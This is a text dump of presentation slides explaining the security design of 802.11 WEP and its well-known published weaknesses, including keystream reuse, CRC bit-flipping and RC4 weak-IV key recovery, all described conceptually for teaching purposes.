802.11 Security

1
802.11 Security Wired Equivalent Privacy
(WEP)

• By
• Shruthi B Krishnan

2
Agenda for the presentation

• Introduction
• 802.11 Wireless LAN brief description
• Goals of WEP
• Confidentiality in WEP
• Data Integrity in WEP
• Access Control in WLANs
• Security loopholes and attacks on WEP
• Lessons to be learnt

3
Introduction

• History of wireless technology
• Inception of wireless networking took place at
  the University of Hawaii in 1971. It was called
  ALOHAnet.
• Star topology with 7 computers
• Spanned 4 Hawaiian islands with the central
  system in Oahu
• In 1997, worlds first WLAN standard 802.11 was
  approved by IEEE
• Wired Equivalent Privacy security standard
  proposed by 802.11
• Has many loopholes and has been completely broken

4
802.11 Wireless LAN brief description
Distribution system
Access Points
Wireless Medium
Mobile stations
Mobile stations

• Stations
• Wireless medium
• Access Points
• Distribution System
• Basic Service Set (BSS)
• Extended Service set (ESS)

5
802.11 Wireless LAN brief description
(contd)Network services

• Distribution System services
• Association
• Disassociation
• Reassociation
• Station services
• Authentication
• Deauthentication
• Privacy

Inside the network
Outside the network
Successful Association/ Reassociation
Successful Authentication
Disassociation
Deathentication
Authenticated and Associated
Unauthenticated and Unassociated
Authenticated and Unassociated
6
Goals of WEP

• Confidentiality
• Uses stream cipher RC4 for encryption
• Data Integrity
• Uses cyclic redundancy check
• Access control
• Shared key authentication

7
Confidentiality in WEP

• One-time pad vs Stream ciphers
• Perfect randomness is compromised for
  practicality
• RC4 algorithm used for encryption of data frames

Plaintext
Ciphertext

KEY
Keystream
IV
8
Confidentiality in WEP (contd)WEP keys and
Initialization vector (IV)

• Shared secret key
• Shared among all users
• Changed infrequently
• Original standard 40 bit key. Later
  implementations used 104 bit key
• WEP uses set of up to 4 keys
• Key distribution problems
• Initialization vector
• 24 bits
• Prepended with the secret key
• Need to be random to prevent key reuse or IV
  collision
• IV sent in clear

9
Data Integrity in WEP

• Computes Integrity Check Value (ICV)
• ICV is appended with data frame and encrypted
• CRC-32 algorithm used
• Efficient in capturing data tampering
• Cryptographically insecure

10
Confidentiality and data integrity in WEP
40 or 104 bit key
CRC-32
Plaintext
RC4
IV
Plaintext ICV
Keystream

Plaintext ICV
Plaintext ICV
IV
Frame Header
4 bytes
3 bytes
pad
Key index
11
Access Control in WLANs

• Open System Authentication
• Shared key authentication

Request for access
Challenge text, R
Encrypt R using WEP
Mobile station
Access Point
12
Security loopholes and attacks on WEPAttacks on
shared key authentication
Request for access
Challenge text, R1
Encrypt R1 using WEP (C1)
Good guy
Access Point

• Keystream R1 C1

Request for access
Challenge text, R2
Encrypt R2 using WEP (C2 Keystream R2)

Bad guy
Access Point
13
Security loopholes and attacks on WEP -
(contd)Attacks due to keystream reuse
Plaintext
Plaintext
Ciphertext


Keystream


Ciphertext
Plaintext
Plaintext

• Improper IV management
• IV-space is small
• Implementation dependent
• Sent in clear
• Recovery of plaintexts
• Decryption dictionary attacks
• Independent of keysize

14
Security loopholes and attacks on WEP -
(contd)Attacks due to CRC
?

Plaintext
Plaintext


?c
ICV
ICV

Plaintext ICV
?
?c


Plaintext ICV

• CRC is good for message authentication, but bad
  for security
• Both CRC checksum and RC4 are linear and can be
  easily manipulated
• CRC is unkeyed
• Attacker can inject messages into the system

15
Security loopholes and attacks on WEP -
(contd)Attacks exploiting the Access Points
Mobile station
Access Point
Attacker
Change destination address
16
Security loopholes and attacks on WEP -
(contd)Attacks exploiting the Access Points
TCP ACK
Message with flipped bits
Mobile station
Access Point
Intercepted ciphertext with flipped bits
TCP ACK

• Access points can be used to monitor TCP/IP
  traffic
• Recipient send an ACK only if TCP checksum is
  correct
• TCP checksum remains unaltered if Pi ex-OR Pi16
  is 1.

Attacker
Modify any Pi and Pi16
17
Security loopholes and attacks on WEP -
(contd)Attacks on RC4 used by WEP

• Research by Scott Fluhrer, Itsik Mantin and Adi
  Shamir
• First byte of plaintext has to be known. For WEP
  implementations, it is 0xAA
• Set of weak keys that correspondingly reveal some
  part of the secret key
• Format of weak IVs
• First byte (B) can range from 0x03 to 0x07
• Second byte has to be 0xFF
• Third byte (N) can be any known value between 0
  255.
• Probability to find a byte of secret key for 60
  different values of N is non-negligible
• Several successful experiments based on this
  attack
• Popular key-recovery programs like Airsnort use
  this analysis

18
Lessons learnt from the failure of WEP

• Key shared by all users of the system
• Key is changed infrequently
• No Perfect forward secrecy
• Manual key management
• Key reuse due to non-random IVs
• Random IVs are not insisted upon
• Short IVs
• No protection for replay attacks
• Use of unkeyed CRC instead of SHA1-HMAC
• Encryption cipher used was weak
• WEP was not publicly reviewed before it became a
  standard
• WEP is insecure!!

19
References

• The Institute of Electrical and Electronics
  Engineers (IEEE) website
• http//www.ieee.org
• 802.11Wireless Networks- The Definitive Guide
• By Matthew S. Gast, OREILLY Publications.
• History of wireless
• http//www.ac.aup.fr/a38972/final_projectIT338/hi
  story.html
• Intercepting Mobile Communications The
  Insecurity of 802.11
• By Nikita Borisov, Ian Goldberg, and David
  Wagner
• http//www.isaac.cs.berkeley.edu/isaac/wep-faq.ht
  ml
• Weaknesses in the Key Scheduling Algorithm of RC4
• By Scott Fluhrer, Itsik Mantin and Adi Shamir
• http//www.crypto.com/papers/others/rc4_ksaproc.p
  df